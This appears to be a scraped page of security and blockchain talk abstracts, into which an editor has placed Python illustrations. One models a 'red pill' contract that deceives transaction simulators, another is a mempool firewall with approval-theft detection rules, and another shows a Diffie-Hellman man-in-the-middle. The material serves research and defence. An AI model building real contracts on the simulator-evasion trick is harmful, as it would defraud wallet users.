The introduction of Web3 smart contracts has opened unlimited opportunities for decentralized apps (dApps) and users. With smart contracts, anything that can be coded can be deployed by anyone on the blockchain. As a result, in a Web3 environment, the users’ blockchain transactions, previously merely used for sending coins to peers, are now, in fact, Remote Procedure Calls (RPCs) for smart contracts.
The flip side of this expressiveness is that it is almost impossible to know analytically, in advance, what the outcome of such an RPC to an arbitrary smart contract will be. Attackers abuse this observability gap to trick users into signing transactions that are, in reality, harmful. The situation closely resembles the desktop environment, where users need to judge in advance whether a program's behavior will be benign.
To close this gap, Web3 security has taken a page from the desktop security book and uses sandbox-style emulation to evaluate a transaction's outcome before it is sent to the blockchain. In Web3 lingo, such sandbox emulation is referred to as transaction simulation.
In this talk, we will present our newly discovered attack methods against Web3 simulations, including the first-ever Web3 red pill exploits, which allow smart contracts to detect that they are running in a simulation and, as a result, behave differently.
We have tested our findings against numerous leading simulation providers in the Ethereum Virtual Machine (EVM) domain and found that they are indeed vulnerable to such attacks. As a result of our responsible disclosure, multiple (currently three) issues were fixed, and we were awarded bug bounties. We will explain these exploits in detail, including the research methodology allowing us to inspect simulators’ inaccessible inner workings.
We will conclude with new and enlightening insights we gained through this research regarding the true capabilities and limitations of Web3 simulations.
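A model of the red pill idea in Python, added here and not code from the talk. The contract, the simulator, and the assumption that a simulator leaves block fields such as the coinbase and base fee at placeholder values are all illustrative; the differential-simulation check at the end is the editor's suggested mitigation, not one the talk describes.

```python
"""Model of a transaction simulator and an environment-aware ("red pill")
contract. Added example, not code from the talk: the contract, the simulator
and the block fields it leaves at placeholder values are all illustrative
assumptions, as is the differential-simulation check at the end."""
import secrets
from dataclasses import dataclass, field

ZERO_ADDRESS = "0x" + "00" * 20


@dataclass
class BlockEnv:
    number: int
    timestamp: int
    coinbase: str
    basefee: int   # wei


@dataclass
class State:
    balances: dict = field(default_factory=dict)


def red_pill_contract(env: BlockEnv, state: State, caller: str, payment: int) -> dict:
    """Hypothetical contract: pays out when the block context looks like a
    simulator placeholder, keeps the payment when it looks like a real block."""
    state.balances[caller] = state.balances.get(caller, 0) - payment
    looks_simulated = env.coinbase == ZERO_ADDRESS or env.basefee == 0
    if looks_simulated:                       # what the wallet preview shows
        state.balances[caller] += 2 * payment
        return {"event": "Airdrop", "to": caller, "amount": 2 * payment}
    return {"event": "Transfer", "from": caller, "amount": payment}   # what lands on chain


def honest_contract(env: BlockEnv, state: State, caller: str, payment: int) -> dict:
    """Hypothetical contract with no dependence on block context."""
    state.balances[caller] = state.balances.get(caller, 0) - payment
    return {"event": "Transfer", "from": caller, "amount": payment}


def naive_simulate(contract, caller: str, payment: int, balance: int) -> dict:
    """Simulator that fills the block context with placeholder values."""
    env = BlockEnv(number=0, timestamp=0, coinbase=ZERO_ADDRESS, basefee=0)
    state = State({caller: balance})
    outcome = contract(env, state, caller, payment)
    return {"outcome": outcome, "balance": state.balances[caller]}


def plausible_env(head: BlockEnv) -> BlockEnv:
    """Derive a realistic next-block context from the current chain head."""
    return BlockEnv(
        number=head.number + 1,
        timestamp=head.timestamp + 12,
        coinbase="0x" + secrets.token_hex(20),
        basefee=head.basefee + secrets.randbelow(head.basefee // 8 + 1),
    )


def differential_simulate(contract, caller: str, payment: int, balance: int,
                          head: BlockEnv, runs: int = 4) -> dict:
    """Run the same call under the placeholder context and several plausible
    real contexts; any divergence means the contract is environment-sensitive
    and the preview cannot be trusted."""
    results = set()
    for _ in range(runs):
        state = State({caller: balance})
        outcome = contract(plausible_env(head), state, caller, payment)
        results.add((outcome["event"], state.balances[caller]))
    placeholder = naive_simulate(contract, caller, payment, balance)
    results.add((placeholder["outcome"]["event"], placeholder["balance"]))
    return {"consistent": len(results) == 1, "results": sorted(results)}
```

The naive simulator reports an "Airdrop" for the red pill contract while every realistic context yields a plain "Transfer"; the honest contract gives the same result everywhere. Which fields a given simulator actually leaves at defaults is exactly what the talk's methodology sets out to discover, so treat the coinbase and base fee here as placeholders for whatever the real tell turns out to be.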
Web3 Security: The Blockchain is Your SIEM (Tal Be'ery)
2021’s hottest new tech term, according to TechCrunch, was “definitely Web3”. Web3, as its name suggests, is considered by many as the future of the internet: decentralized, permissionless, and based on modern blockchain technology. While Web3 might have a bright future, it’s in the middle of growing pains: A number of Web3 apps were hacked in 2021, leading to theft of cryptoassets valued at hundreds of millions of US Dollars. In this talk we will present Web3 app technology, dissect new attack surfaces, and suggest new and exciting defense mechanisms.
First, we will dive into the technical details of Web3 applications, showing how Web3 technology opens new attack surfaces by moving app functionality onto the blockchain. We will then analyze these newly-exposed attack surfaces by reviewing a few examples we’ve discovered “in the wild.”
While Web3 exposes new attack surfaces, it also provides novel detection opportunities. Specifically, the public and transparent nature of the blockchain allows security researchers to immediately explore full details of any attack and, as a result, leads to quick and thorough discoveries. This is a paradigm shift in security research, as current practices only allow a few to learn actual attack details, only some portions of which are shared publicly. This shift in transparency allowed us to independently explore the aforementioned attacks.
Furthermore, we believe we can do even better and go beyond rapid post-mortem reports. We will show how the same raw data we had previously used for post-mortem analysis can be analyzed in real time (or even ante factum, by "taking a peek" into the blocks that have yet to be mined) to detect and even prevent attacks. This capability is enabled by the online nature of the blockchain and its inherent block time delays. In fact, we can import, with relevant modifications, many of the principles and learnings of current web defenses, including the Web Application Firewall (WAF), into the realm of blockchain. By doing so, we introduce a scheme for a Web3 Application Firewall (W3AF) that can greatly improve the security of Web3 and blockchain-based apps.
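One way to realize the W3AF idea over pending transactions, as an added example that is not the talk's own scheme: the rules, the trusted-spender allowlist and the pending transactions are constructed here, while the four-byte function selectors are the standard ERC-20 and ERC-721 ones.

```python
"""Toy Web3 Application Firewall (W3AF) pass over pending transactions.
Added example, not the talk's scheme: the rules, the trusted-spender list
and the pending transactions are constructed for illustration."""

# First 4 bytes of keccak256(signature): standard ERC-20 / ERC-721 selectors.
SELECTORS = {
    "095ea7b3": "approve(address,uint256)",
    "a22cb465": "setApprovalForAll(address,bool)",
    "a9059cbb": "transfer(address,uint256)",
}
UINT256_MAX = 2**256 - 1

# Hypothetical allowlist of spenders/operators the wallet considers trusted.
TRUSTED_SPENDERS = {"0x" + "cc" * 20}


def decode_words(calldata_hex: str):
    """Split ABI calldata into the 4-byte selector and 32-byte argument words."""
    raw = calldata_hex[2:] if calldata_hex.startswith("0x") else calldata_hex
    data = bytes.fromhex(raw)
    if len(data) < 4 or (len(data) - 4) % 32:
        raise ValueError("malformed calldata")
    return data[:4].hex(), [data[i:i + 32] for i in range(4, len(data), 32)]


def word_to_address(word: bytes) -> str:
    """Addresses are left-padded with 12 zero bytes; anything else is suspicious."""
    if any(word[:12]):
        raise ValueError("address word has non-zero padding")
    return "0x" + word[12:].hex()


def inspect_tx(tx: dict) -> list:
    """Return (severity, reason) findings for one pending transaction."""
    if tx["input"] in ("", "0x"):
        return []                      # plain value transfer, nothing to decode
    try:
        selector, words = decode_words(tx["input"])
        sig = SELECTORS.get(selector)
        if sig == "approve(address,uint256)" and len(words) == 2:
            spender = word_to_address(words[0])
            amount = int.from_bytes(words[1], "big")
            if amount == UINT256_MAX and spender not in TRUSTED_SPENDERS:
                return [("high", f"unlimited ERC-20 approval to untrusted spender {spender}")]
        elif sig == "setApprovalForAll(address,bool)" and len(words) == 2:
            operator = word_to_address(words[0])
            if int.from_bytes(words[1], "big") == 1 and operator not in TRUSTED_SPENDERS:
                return [("high", f"collection-wide NFT approval to untrusted operator {operator}")]
        elif sig is None and tx.get("value", 0) > 0:
            return [("medium", f"value sent into unknown function {selector}")]
    except ValueError as exc:
        return [("low", f"undecodable calldata: {exc}")]
    return []


def scan_pending(pending: list) -> list:
    """Run the rules over a batch of pending txs; returns (hash, findings) for hits."""
    report = []
    for tx in pending:
        findings = inspect_tx(tx)
        if findings:
            report.append((tx["hash"], findings))
    return report


def sample_pending() -> list:
    """Constructed pending transactions (not real chain data)."""
    attacker, trusted = "ee" * 20, "cc" * 20
    return [
        {"hash": "0x01", "value": 0,          # unlimited approve() to unknown spender
         "input": "0x095ea7b3" + "00" * 12 + attacker + "ff" * 32},
        {"hash": "0x02", "value": 0,          # bounded approve() to trusted router
         "input": "0x095ea7b3" + "00" * 12 + trusted + "00" * 31 + "64"},
        {"hash": "0x03", "value": 0,          # setApprovalForAll(attacker, true)
         "input": "0xa22cb465" + "00" * 12 + attacker + "00" * 31 + "01"},
        {"hash": "0x04", "value": 10**18, "input": "0x"},          # plain ETH transfer
        {"hash": "0x05", "value": 10**17, "input": "0xdeadbeef"},  # ETH into unknown function
    ]
```

The point of working on the mempool rather than on mined blocks is the lead time the abstract mentions: a finding raised here arrives before the transaction is included, which is when a wallet or relay can still refuse to broadcast it.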
Bitcoin: A Peer-to-Peer Electronic Cash System
Satoshi Nakamoto
satoshin@gmx.com
www.bitcoin.org
Abstract.
A purely peer-to-peer version of electronic cash would allow online payments to be sent directly from one party to another without going through a financial institution. Digital signatures provide part of the solution, but the main benefits are lost if a trusted third party is still required to prevent double-spending. We propose a solution to the double-spending problem using a peer-to-peer network. The network timestamps transactions by hashing them into an ongoing chain of hash-based proof-of-work, forming a record that cannot be changed without redoing the proof-of-work. The longest chain not only serves as proof of the sequence of events witnessed, but proof that it came from the largest pool of CPU power. As long as a majority of CPU power is controlled by nodes that are not cooperating to attack the network, they'll generate the longest chain and outpace attackers. The network itself requires minimal structure. Messages are broadcast on a best effort basis, and nodes can leave and rejoin the network at will, accepting the longest proof-of-work chain as proof of what happened while they were gone.
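A minimal proof-of-work chain in Python illustrating the mechanics the abstract describes, added here and not Bitcoin's code: blocks commit to the previous hash, altering a block without redoing the work breaks every later link, and the chain with the most cumulative work is selected. Difficulty, block format and transactions are toy values.

```python
"""Minimal proof-of-work chain. Added example, not Bitcoin's code: blocks are
timestamped by hashing into a chain, changing a block invalidates every later
one unless the work is redone, and the chain with the most work wins."""
import hashlib
import json


def block_hash(block: dict) -> str:
    payload = {k: block[k] for k in ("prev", "txs", "timestamp", "bits", "nonce")}
    return hashlib.sha256(json.dumps(payload, sort_keys=True).encode()).hexdigest()


def meets_target(h: str, bits: int) -> bool:
    """bits = number of leading zero bits the hash must have."""
    return int(h, 16) >> (256 - bits) == 0


def mine(prev: str, txs: list, bits: int, timestamp: int = 0) -> dict:
    """Grind the nonce until the block hash meets the target."""
    block = {"prev": prev, "txs": txs, "timestamp": timestamp, "bits": bits, "nonce": 0}
    while not meets_target(block_hash(block), bits):
        block["nonce"] += 1
    block["hash"] = block_hash(block)
    return block


def valid_chain(chain: list) -> bool:
    """Recompute every hash and link; an edit without re-mining fails here."""
    prev = "0" * 64
    for block in chain:
        h = block_hash(block)
        if h != block["hash"] or block["prev"] != prev or not meets_target(h, block["bits"]):
            return False
        prev = h
    return True


def chain_work(chain: list) -> int:
    """Expected number of hashes needed to build the chain: 2**bits per block."""
    return sum(2 ** b["bits"] for b in chain)


def best_chain(*chains: list) -> list:
    """'Longest chain' in the abstract's sense: the valid chain with most work."""
    valid = [c for c in chains if valid_chain(c)]
    return max(valid, key=chain_work) if valid else []


def build_chain(txs_per_block: list, bits: int) -> list:
    chain, prev = [], "0" * 64
    for i, txs in enumerate(txs_per_block):
        block = mine(prev, txs, bits, timestamp=i)
        chain.append(block)
        prev = block["hash"]
    return chain
```

Twelve leading zero bits keeps each block to a few thousand hashes so the example runs in well under a second; the same code with a larger target is what makes rewriting history cost as much as the honest network has already spent.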
***** Blockchain Training : https://www.edureka.co/blockchain-training *****
This Edureka video on "Blockchain Explained" guides you through the fundamentals of the new, revolutionary technology called Blockchain and its defining concepts. Below are the topics covered in this tutorial:
1. History of blockchain
2. What is Blockchain
3. Traditional Transaction vs Blockchain
4. How Blockchain Works
5. Benefits of Blockchain
6. Blockchain Transaction Demo
Here is the link to the Blockchain blog series: https://goo.gl/DPoAHR
You can also refer to this playlist on Blockchain: https://goo.gl/V5iayd
In this presentation, Dmitry Khlebnikov sets out six broad principles for designing secure IT systems. He also provides a comprehensive overview of "Host-based Security".
This presentation is about the International Data Encryption Algorithm (IDEA). It is the first ever PPT that includes its history, encryption, figures, decryption and applications. Do share your views after viewing it, if you like.
The following slides explain elliptic curves, their interpretation over Galois finite fields, algorithms that reduce the arithmetic computational requirements, and the primary applications of ECC.
Cryptography is the science of using mathematics to encrypt and decrypt data. This presentation explains cryptography, its history, and its two main types, symmetric and asymmetric cryptography.
This Edureka Blockchain technology tutorial will give you an understanding of how blockchain works and what blockchain technologies are. This tutorial covers the following topics:
1. What are Blockchain & Bitcoin
2. Blockchain Technologies
3. Peer to Peer Network
4. Cryptography
5. Proof of Work & Blockchain Program
6. Ethereum & Smart Contracts
7. Blockchain Applications and Use Cases
This "Blockchain Technology Explained" presentation will help you understand what Blockchain technology is, the issues with the banking system, how Bitcoin solved those issues, and the features of Blockchain, which include a public distributed ledger, proof of work and mining. At the end, you will also see a use case implementation demonstrating Blockchain mining. Blockchain technology today is very robust, and it has many aspects, such as the programming language, the distributed ledger and the Bitcoin cryptocurrency. Now, let's dive into these slides and take a look at how Blockchain technology works in detail.
Below topics are explained in this "Blockchain Technology Explained" presentation:
1. Issues with the current banking system
2. How Bitcoin solved these issues
3. What is Blockchain Technology?
4. Features of Blockchain
- Public distributed ledger
- Proof of work
- Mining
5. Use case - Blockchain mining
Simplilearn’s Blockchain Certification Training has been designed for developers who want to decipher the global craze surrounding Blockchain, Bitcoin and cryptocurrencies. You’ll learn the core structure and technical mechanisms of Bitcoin, Ethereum, Hyperledger and Multichain Blockchain platforms, use the latest tools to build Blockchain applications, set up your own private Blockchain, deploy smart contracts on Ethereum and gain practical experience with real-world projects.
Why learn Blockchain?
Blockchain technology is the brainchild of Satoshi Nakamoto and enables digital information to be distributed. A network of computing nodes makes up the Blockchain. Durability, robustness, success rate, transparency and incorruptibility are some of its enticing characteristics. By design, Blockchain is a decentralized technology used by a global network of computers to manage Bitcoin transactions easily. Many new business applications will result from the usage of Blockchain, such as crowdfunding, smart contracts, supply chain auditing and the Internet of Things (IoT).
The Blockchain Certification Training Course is recommended for:
1. Developers
2. Technologists interested in learning Ethereum, Hyperledger and Blockchain
3. Technology architects wanting to expand their skills to Blockchain technology
4. Professionals curious to learn how Blockchain technology can change the way we do business
5. Entrepreneurs with technology background interested in realizing their business ideas on the Blockchain
Learn more at: https://www.simplilearn.com/
This presentation simplifies Cloud, Cloud Security and Cloud Security Certifications. This includes the following:
- Understanding Cloud
- Understanding Cloud Security using the Risk Management and Cloud Security Control Frameworks
- Cloud Security Certifications
- Key Definitions
Share data across a network spread over multiple sites using the Distributed Ledger PowerPoint Presentation Slides. Transactions have public witnesses, which makes cyber attacks difficult. Understand the technology behind fast and secure transactions. Make your audience understand the concept of a decentralized network that lets you share data of many kinds, such as currency, digital values and databases. With the help of this distributed ledger PPT slideshow, participants in the process can learn to access the records shared across the network. This deck comprises various templates covering the transparency of an electronic cash system: the distributed ledger, how a distributed ledger works, uses of a distributed ledger, smart contracts, privacy, letters of credit, corporate debt, industrial blockchain benefits, blockchain limitations, etc. These templates are editable. You can use them the way you want and modify them as per your needs. Add your content and use this deck to explain sending and receiving data across multiple networks. Download the ready-to-use distributed ledger PPT slides now. Our Distributed Ledger PowerPoint Presentation Slides follow a customized display, so every detail is shown as you desire.
The Walgreens Story: Putting an API Around Their Stores (Webcast), Apigee | Google Cloud
Walgreens made headlines in 2012 by releasing APIs for mobile developers to enable photo printing from smartphones and quickly followed up with an API for prescription drugs. But what's a traditional business like Walgreens doing with an API? Way beyond increased relevance in an Instagram age, the Walgreens story is one of transformation of an entire business model.
Join Joe Rago and Nicholas Eby of Walgreens and Brian Mulloy of Apigee for a discussion of Walgreens' journey through the digital transformation of a century old brick-and-mortar enterprise.
If you can't make it to the live webcast, register below and we'll send you a video recording with slides.
We will discuss:
- The path to an API - hurdles, decisions, and milestones
- Walgreens APIs - key features and technology
- Developer and partner programs - awareness and integrations
- 3rd party developers - gaining awareness and integrations
The presentation includes:
- Diffie-Hellman key exchange algorithm
- Primitive roots
- Discrete logarithm and the discrete logarithm problem
- Attacks on Diffie-Hellman and their possible solutions
- Key distribution center
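An added Python example covering the listed topics (not material from the slides): a primitive-root test, the exchange itself with both parties' values, a brute-force discrete logarithm that shows why the problem is only easy at toy size, and the man-in-the-middle that an unauthenticated exchange permits. The primes used are toy values chosen for the example.

```python
"""Diffie-Hellman over a toy prime: primitive-root test, the exchange itself,
the discrete-log brute force that is only feasible at this size, and the
man-in-the-middle that an unauthenticated exchange allows. Added example,
not the slides' material; the parameters are toy values, never use them."""
import secrets


def is_primitive_root(g: int, p: int) -> bool:
    """g is a primitive root mod prime p iff g^((p-1)/q) != 1 for every
    prime factor q of p-1 (then its order is exactly p-1)."""
    n = m = p - 1
    factors, q = set(), 2
    while q * q <= m:
        while m % q == 0:
            factors.add(q)
            m //= q
        q += 1
    if m > 1:
        factors.add(m)
    return all(pow(g, n // q, p) != 1 for q in factors)


def keypair(p: int, g: int):
    """Private exponent in [2, p-2]; reject the public values 1 and p-1."""
    while True:
        priv = 2 + secrets.randbelow(p - 3)
        pub = pow(g, priv, p)
        if 1 < pub < p - 1:
            return priv, pub


def shared(p: int, their_pub: int, my_priv: int) -> int:
    """Validate the peer's value before exponentiating: 0, 1 and p-1 would
    force the shared secret into a trivial subgroup."""
    if not 1 < their_pub < p - 1:
        raise ValueError("public value outside the allowed range")
    return pow(their_pub, my_priv, p)


def discrete_log(p: int, g: int, h: int) -> int:
    """Brute-force x with g^x = h (mod p). Cost grows with p, which is why
    real groups use primes of 2048 bits or more."""
    x, acc = 0, 1
    while acc != h:
        acc = acc * g % p
        x += 1
        if x >= p:
            raise ValueError("no solution")
    return x


def mitm_exchange(p: int, g: int):
    """Alice and Bob exchange public values with no authentication. Mallory
    substitutes her own value in both directions and can derive both keys."""
    a, A = keypair(p, g)
    b, B = keypair(p, g)
    m, M = keypair(p, g)
    k_alice = shared(p, M, a)      # Alice believes M came from Bob
    k_bob = shared(p, M, b)        # Bob believes M came from Alice
    return k_alice, k_bob, shared(p, A, m), shared(p, B, m)
```

The exchange itself is `keypair` on each side followed by `shared` on the peer's value; the last function shows that without signing or otherwise authenticating those values (the slides' "possible solution", whether via signatures or a key distribution center) an active attacker ends the exchange holding both secrets.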
Non-fungible tokens (NFTs) are unique digital assets that are verified on a blockchain network, allowing for the creation and ownership of one-of-a-kind digital items, such as artwork, music, videos, and other types of digital content. They are important because they provide a way for digital creators to monetize their work and establish ownership, scarcity, and authenticity of their creations. NFTs have also gained popularity as a form of investment and collectible item, with some NFTs selling for millions of dollars.
This slide deck includes the following sections:
Introduction: Provide a brief overview of what NFTs are and their significance in the digital world.
How NFTs work: Explain the process of creating and verifying NFTs on a blockchain network, including the use of smart contracts and cryptographic hashing.
Types of NFTs: Describe the various types of NFTs that can be created, such as digital artwork, music, videos, and other types of digital content.
Benefits of NFTs: Highlight the benefits of NFTs, including the ability to establish ownership, scarcity, and authenticity of digital assets, as well as their potential as a new source of revenue for creators.
Market trends: Provide an overview of the current state of the NFT market, including recent sales and trends in various industries, such as art, sports, and gaming.
Potential use cases: Discuss potential use cases for NFTs beyond the current market, such as in the areas of identity verification, supply chain management, and digital voting.
Challenges and risks: Acknowledge the challenges and risks associated with NFTs, such as environmental concerns related to blockchain networks and the potential for fraudulent activity.
Conclusion: Summarize the key takeaways of the presentation and emphasize the growing importance of NFTs in the digital world.
Ethereum Smart Contract Master's Thesis (Daniel Connelly)
Ethereum is a unique offshoot of blockchain technologies that incorporates the use of what are called smart contracts or Dapps – small-sized programs that orchestrate financial transactions on the Ethereum blockchain. With this fairly new paradigm in blockchain, however, comes a host of security concerns and a track record that reveals a history of losses in the range of millions of dollars. Since Ethereum is a decentralized entity, these concerns are not allayed as they are in typical financial institutions. For example, there is no Federal Deposit Insurance Corporation (FDIC) to back the investors of these contracts from financial loss as there is with bank depositors. Furthermore, there is also no Better Business Bureau (BBB) or Consumer Reports organization to offer any sort of ratings on these contracts.
However, there exists a well-known method for verifying a program’s integrity; a method called symbolic execution. Such an examination promises to give not only a perspective on the security of Ethereum, but also highlight areas where security experts may need to target to more quickly improve upon the security of this blockchain.
This paper proposes a solution to ensuring security and increasing end user confidence -- a digital registry of smart contracts that have security flaws in them. A rating system for contracts is proposed and the capabilities one has with knowledge of these vulnerabilities is examined. This research attempts to give a picture of the current state of security of Ethereum Smart Contracts by employing symbolic analysis on a portion of the Smart Contracts up until approximately the 8.4 millionth block.
Vulnerabilities in smart contracts may be prevalent and, if they are, a registry enumerating the vulnerable contracts can be built and used to identify them easily.
Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018 (Codemotion)
Due to the immutability of the ledger and the difficulty of updating their consensus rules, Blockchain applications have many critical layers where a bug can cause huge, irreversible fund losses. This talk will shed some light on why and how Blockchain applications are so critical and will discuss past events that led to fund loss or consensus failures due to bugs in critical parts of the code of Bitcoin and Ethereum applications.
Stefano Maestri - Blockchain and smart contracts, what they are and why you s... - Codemotion
After a brief introduction on what blockchain technology is and how it works under the hood, focusing on Ethereum, the next-generation blockchain implementation, we will focus on the concept of the smart contract, introducing it through a simple case study and its standard implementation in Ethereum. We will code it in the Solidity language, deploying and testing it in a live demo on an Ethereum test network.
Best practices to build secure smart contracts - Gautam Anand
- Quick update in blockchain tech space
- Comparison between tech
- Security in Blockchain (Focusing on ETH Solidity attack vectors)
- Design patterns
- 2 Popular hacks (Case study)
Tucson Blockchain Devs meetup June 7 and O'Reilly Fluent 2018. Some things to consider if you're starting to think about how to integrate with blockchains.
How to Create Blockchain Products by Fr8 Network Lead Engineer - Product School
Blockchain has swept the tech space by storm and we are now seeing the first wave of products built using this technology. One of the biggest challenges with blockchain is taking very technical concepts, such as signing transactions, and making them intuitive and easy to use.
In this talk, Yev discussed the tools, design decisions, and best practices involved when creating a blockchain product.
This presentation is part of New Product Developers (NPD) meetup regularly conducted by Divum. In this session, we covered gentle introduction to blockchain to running a truly decentralised Pizza ordering application built using solidity on ethereum.
Blockchain has gained lots of attention in recent years. Bitcoin and Ethereum are leading the race. Crypto currencies in spite of uncertainty and volatility are here to stay. Smart contract programming is the future for the Internet 3.0.
Learn the basics of Blockchain technology here. Blockchain is the new disruptive technology around. These slides were used for the session hosted by GTech µLearn with Travancore Analytics.
Smart contract honeypots for profit (and fun) - bhaPolySwarm
Ethereum smart contracts have bugs: a lot of them. So many, in fact, that attackers have flocked to exploit them, but occasionally they lose money themselves. Malicious contracts that look vulnerable but are exploitative are a rising trend, and this talk will discuss how they work and what they do.
How to Create Blockchain Products by Slice.Market CTO - Product School
Main takeaways:
-Intro to blockchain concepts, public/private keys, signing transactions, wallets,
-Product challenges unique to blockchain
-Metamask and other tools that people currently use to interact with the Ethereum blockchain
-Common design and product considerations when making a blockchain product
Decentralized Finance (DeFi) is one of today’s most compelling crypto narratives and Compound is one of its most prominent examples. ZenGo research team has taken a deeper look into one of the most intriguing and novel aspects of the Compound protocol, the Liquidation process.
This whitepaper (originally published on early 2020) offers a step-by-step technological explanation and financial survey of Compound’s Liquidation process and thus offers a learning opportunity on a prominent DeFi project, relevant for both experts and beginners.
Elliptic Curve Cryptography (ECC) protects many relevant everyday technologies, including the SSL/TLS protocol that protects our Internet communications and the ECDSA signatures that protect Bitcoin and Ethereum transactions against modification. In this talk we will learn about ECC cryptography, using the billiards game analogy, which makes ECC understandable even for non-experts. We will describe some attacks against flawed ECC and signature implementations, including the Bluetooth pairing vulnerability recently discovered by Technion researchers.
Slides of our Blackhat USA 2018 talk:
Many new devices are trying to fit into our life seamlessly. As a result, there’s a quest for a “universal access methods” for all devices. Voice activation seems to be a natural candidate for the task and many implementations for it surfaced in recent years. A few notable examples are Amazon’s Alexa, Google’s Assistant and Microsoft’s Cortana.
The problem starts when these “Universal” access methods, aimed for maximal comfort, meet the very “specific” use-case of the enterprise environment which requires comfort to be balanced with other aspects, such as security. Microsoft Cortana is used on Mobile and IoT devices, but also in the enterprise computers as it comes enabled by default with Windows10 and always ready to respond to users’ commands even when the machine is locked.
Allowing interaction with a locked machine is a dangerous architectural decision, and earlier this year, we exposed the Voice of Esau (VoE) exploit for a Cortana vulnerability. The VoE exploit allowed attackers to take over a locked Windows10 machine by combining voice commands and network fiddling to deliver a malicious payload to the victim machine.
In this presentation, we will reveal the “Open Sesame” vulnerability, a much more powerful vulnerability in Cortana that allows attackers to take over a locked Windows machine and execute arbitrary code. Exploiting the “Open Sesame” vulnerability attackers can view the contents of sensitive files (text and media), browse arbitrary web sites, download and execute arbitrary executables from the Internet, and under some circumstances gain elevated privileges. To make matters even worse, exploiting the vulnerability does not involve ANY external code, nor shady system calls, hence making code focused defenses such as Antivirus, Anti-malware and IPS blind to the attack.
We would conclude by suggesting some defense mechanisms and compensating controls to detect and defend against such attacks.
THE VOICE OF ESAU: HACKING ENTERPRISES THROUGH VOICE INTERFACES Tal Be'ery
Our physical environments become increasingly packed with new, computerized, devices that increase our comfort and productivity and augment our everyday experience. These devices maintain a wealth of new and existing types of sensors into our surroundings and offer new channels of communications between humans and machines (voice, gestures), between machines themselves (new wireless protocol standards) and between machines and their motherships in the cloud.
The coexistence of these new devices and interaction models with our "legacy" IT infrastructure have not escaped the eyes of the digital world's most early adopters – the hackers. In their minds, we've just created so many more gateways into our corporate networks with new types of sensorial data to collect (AKA steal) and subvert, and new protocols and formats to abuse in the process of getting access to corporate assets.
As we researched the potential effect of this trend on enterprise cybersecurity we focused on one specific, much hyped, type of interaction: voice. In particular, we examined the voice interaction capabilities that are most prominent in an enterprise environment – those of Microsoft's voice activated assistance Cortana.
During our research, which will be detailed in this session, we were able to fully demonstrate the following scenarios:
Using voice as a gateway into enterprise: We will expose a previously unknown vulnerability in Microsoft Cortana's voice interface (responsibly disclosed to Microsoft and now patched) that allows close proximity attackers to take over an unattended locked Windows 10 computer.
Using voice for lateral movement: We will show how this attack can be further amplified to allow remote attackers to move laterally within the victim's network.
Systematically subverting information produced and used by sensorial systems: We will analyze, in technical detail, the protocol Cortana uses to talk to its cloud and will expose the "Newspeak" tool that utilizes this knowledge to fiddle with the protocol for fun (pranks!) and profit (additional custom functionality!), or just to monitor it for security purposes.
We will conclude our presentation with some practical suggestions regarding defending against this new breed of threats against enterprise networks and assets.
Automate or Die: How Automation Reshapes Cybersecurity - Tal Be'ery
How automation changes both the offensive and the defensive side, focusing on the full automation of targeted attacks. Technical analysis of the orchestration and automation of the Lateral Movement phase with the BloodHound and GoFetch tools.
The Industrial Revolution of Lateral Movement - Tal Be'ery
Tal Maor & Tal Be'ery Blackhat USA 2017 talk
Recent advancements in the Targeted Attacks technology, and specifically to the Lateral Movement phase of it, are about to ignite an Industrial Revolution in this field.
The original Industrial Revolution and its use of modern methods of mass production is said to have brought "improvements in the cost, quality, quantity, and variety of goods available". The Lateral Movement Industrial Revolution will have similar effects on the attack side.
Consequently, it will have grave repercussions on the defensive side. As always when facing a stressful situation, defenders can respond either by: Fight, Flight, or Freeze.
In this talk, we will describe these recent advancements in the field of automated Lateral Movement, followed by a demo and the release of 'GoFetch', a new open-source lateral movement automation tool. We will conclude with a discussion on the implications of Lateral Movement industrialization on both attackers and defenders.
The Enemy Within: Stopping Advanced Attacks Against Local Users - Tal Be'ery
Advanced targeted attackers utilize compromised credentials in order to move laterally within their victims' network. These compromised credentials may consist of either domain or local credentials. Local credentials, especially those of local admins, are a lucrative target for the attackers as they are less managed (password complexity and change policy) and less monitored (no traffic and logs besides the specific computer).
In this talk, we will cover how advanced attackers are abusing local users' credentials in their attacks, including real examples as captured "in the wild". We would follow with suggested new methods and tools to detect and prevent such attacks.
Most notably, we'd expose a tool that implements a method which allows visibility to local users' activity without installing an agent on the monitored machine. The visibility is based on periodic scans of the local users' directory, the Windows Security Account Manager (SAM), using the standard SAM-Remote (SAMR) protocol, messages and APIs. Using these methods defenders gain visibility to local users' logons, group membership, password change among others. Security applications enabled by this visibility include but are not limited to, abnormal logons detection, abnormal group additions and removal detection and abnormal password changes detection.
In this report, we break down the Target attack into 11 detailed steps, beginning with the initial credential theft from Target’s HVAC contractor and ending with the theft of PII and credit cards. Particular attention is given to those steps, unknown until now, such as how the attackers were able to propagate within the network. Throughout this report we highlight pertinent insights into the Tactics, Techniques and Procedures (TTPs) of the attackers. Finally, we provide recommendations on the security measures needed for mitigating similar advanced targeted attacks.
I wrote this paper in 2014 as the VP of Research for Aorato
Today, the topic of cybersecurity has moved from IT and the datacenter to the highest levels of the boardroom. Attacks and threats have grown substantially more sophisticated in frequency and severity. Attackers reside within an internal network an average of eight months before they are even detected. In the vast majority of attacks, they compromise user credentials and they are increasingly using legitimate IT tools rather than malware.
You are now working under the assumption of a breach. How do you find the attackers--before they cause damage?
In this Blackhat talk we will discuss the TTPs (Tactics Techniques & Procedures) of advanced attackers and how they manifest themselves over the network. We will give a special attention to the Reconnaissance and Lateral Movement phases of the Cyber Kill Chain and discuss how network monitoring can be employed to mitigate these risks.
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 1 out of 3
Intro to relevant technologies: HTTP, HTML, HTML5, javascript, same origin policy
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 3 out of 3
Non javascript attacks: including CSRF, attacks on SSL, CSS history, clickjacking
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 2 out of 3
Script injection attacks: including Cross-site scripting, Malvertising, MITM
One Key to Rule Them All: Detecting the Skeleton Key Malware - Tal Be'ery
Identity is one of the cornerstones of application security. On windows domains, identity is managed through Active Directory (AD) Domain service on the Domain Controller (DC). Therefore, it should come as no surprise that advanced attackers are actively targeting the DC.
